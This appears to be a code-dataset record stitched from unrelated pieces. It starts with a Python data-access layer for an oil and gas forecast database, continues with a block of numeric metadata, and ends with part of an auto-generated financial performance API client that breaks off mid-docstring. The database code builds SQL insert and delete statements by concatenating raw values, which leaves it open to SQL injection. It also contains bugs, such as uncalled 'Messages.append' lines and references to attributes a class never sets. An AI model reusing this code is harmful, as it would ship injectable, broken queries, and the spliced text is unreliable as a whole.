FracHitMultipliersObj = m.FracHitMultipliers(self.DBObj, [self.LEName], [self.CorpID], [self.Date_Key])
rows, Success, Message = FracHitMultipliersObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[Frac_Hit_Multipliers] where LEName = \'' + self.LEName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class AreaAggregation:
def __init__(self, DBObj, AggregateName = [], WellNames = [], CorpIDs = []):
from Model import ModelLayer as m
from Model import BPXDatabase as bpx
self.AggregateName = AggregateName
self.WellNames = WellNames
self.CorpIDs = CorpIDs
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.table = 'AreaAggregation'
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.AggregateName:
where_dict['AggregateName'] = self.AggregateName
if self.WellNames:
where_dict['WellName'] = self.WellNames
if self.CorpIDs:
where_dict['CorpID'] = self.CorpIDs
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.AreaAggregationRow(item['AggregateName'] , item['WellName'], item['CorpID'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class AreaAggregationRow:
def __init__(self, AggregateName, WellName, CorpID, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.AggregateName = AggregateName
self.WellName = WellName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[AreaAggregation] (AggregateName, WellName, CorpID, Update_Date, Update_User ) values \n'\
'(\'' + self.AggregateName + '\', \'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Aggregation Area table, Query the table for existing entry
AreaAggregationObj = m.AreaAggregation(self.DBObj, [self.LEName], [self.CorpID], [self.Date_Key])
rows, Success, Message = AreaAggregationObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[AreaAggregation] where AggregateName = \'' + self.AggregateName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class ProductionAdjustments:
def __init__(self, DBObj, LEName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'ProductionAdjustments'
self.LEName = LEName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.LEName:
where_dict['LEName'] = self.LEName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
if isinstance(self.Date_Key[0], datetime):
self.Date_Key[0] = self.Date_Key[0].strftime('%Y-%m-%d %H:%M:%S')
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.ProductionAdjustmentsRow(item['LEName'] , item['WellName'], item['CorpID'], item['Date_Key'], item['AdjustedGasProduction'], item['AdjustedOilProduction'], item['AdjustedWaterProduction'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class ProductionAdjustmentsRow:
def __init__(self, LEName, WellName, CorpID, Date_Key, AdjustedGasProduction, AdjustedOilProduction, AdjustedWaterProduction, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.LEName = LEName
self.WellName = WellName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.AdjustedGasProduction = AdjustedGasProduction
self.AdjustedOilProduction = AdjustedOilProduction
self.AdjustedWaterProduction = AdjustedWaterProduction
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not self.AdjustedGasProduction:
self.AdjustedGasProduction = 0
if not self.AdjustedOilProduction:
self.AdjustedOilProduction = 0
if not self.AdjustedWaterProduction:
self.AdjustedWaterProduction = 0
insert_statement = 'insert into [LEForecastDatabase].[dbo].[ProductionAdjustments] (LEName, WellName, CorpID, Date_Key, AdjustedGasProduction, AdjustedOilProduction, AdjustedWaterProduction, Update_Date, Update_User)'\
' values (\'' + self.LEName + '\', \'' + self.WellName + '\', \'' + self.CorpID + '\', convert(datetime, \'' + self.Date_Key + '\', 120) , ' + str(self.AdjustedGasProduction) + ',\n'\
'' + str(self.AdjustedOilProduction) + ', ' + str(self.AdjustedWaterProduction) + ', convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE Data table, Query the table for existing entry
ProdAdjustmentsObj = m.ProductionAdjustments(self.DBObj, [self.LEName], [self.CorpID], [self.Date_Key])
rows, Success, Message = ProdAdjustmentsObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Production Adjustments table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[ProductionAdjustments] where LEName = \'' + self.LEName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
| 39.825166
| 306
| 0.550364
| 6,648
| 65,831
| 5.358153
| 0.037304
| 0.030319
| 0.035372
| 0.028635
| 0.840459
| 0.829595
| 0.817299
| 0.793942
| 0.779372
| 0.777435
| 0
| 0.001987
| 0.350063
| 65,831
| 1,653
| 307
| 39.825166
| 0.830552
| 0.036001
| 0
| 0.827056
| 0
| 0.006918
| 0.15303
| 0.022361
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049193
| false
| 0.000769
| 0.093774
| 0
| 0.19216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a6050dfbe4ba042e42fdfbe7990e4308316eee
| 104,391
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/performance_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/performance_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/performance_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Hydrogen Atom API
The Hydrogen Atom API # noqa: E501
OpenAPI spec version: 1.7.0
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class PerformanceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_account_performance_using_get(self, account_id, **kwargs): # noqa: E501
"""Account Performance # noqa: E501
Get information on the performance of an account using IRR (Internal Rate of Return). You must provide the unique account_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_performance_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id -/account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_performance_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_performance_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_performance_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Account Performance # noqa: E501
Get information on the performance of an account using IRR (Internal Rate of Return). You must provide the unique account_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_performance_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id -/account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/account/{account_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_allocation_performance_using_get(self, allocation_id, **kwargs): # noqa: E501
"""Allocation Performance # noqa: E501
Get information on the performance of an allocation using TWR (Time Weighted Return). You must provide the unique allocation_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_allocation_performance_using_get(allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str allocation_id: Allocation Id -/allocation (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Tenant Benchmark Id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param bool is_current_weight: is_current_weight
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type found under the Statistics banner
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_allocation_performance_using_get_with_http_info(allocation_id, **kwargs) # noqa: E501
else:
(data) = self.get_allocation_performance_using_get_with_http_info(allocation_id, **kwargs) # noqa: E501
return data
def get_allocation_performance_using_get_with_http_info(self, allocation_id, **kwargs): # noqa: E501
"""Allocation Performance # noqa: E501
Get information on the performance of an allocation using TWR (Time Weighted Return). You must provide the unique allocation_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_allocation_performance_using_get_with_http_info(allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str allocation_id: Allocation Id -/allocation (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Tenant Benchmark Id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param bool is_current_weight: is_current_weight
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type found under the Statistics banner
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['allocation_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'is_current_weight', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_allocation_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'allocation_id' is set
if ('allocation_id' not in params or
params['allocation_id'] is None):
raise ValueError("Missing the required parameter `allocation_id` when calling `get_allocation_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'allocation_id' in params:
path_params['allocation_id'] = params['allocation_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'is_current_weight' in params:
query_params.append(('is_current_weight', params['is_current_weight'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/allocation/{allocation_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_benchmark_performance_using_get(self, benchmark_id, **kwargs): # noqa: E501
"""Benchmark Performance # noqa: E501
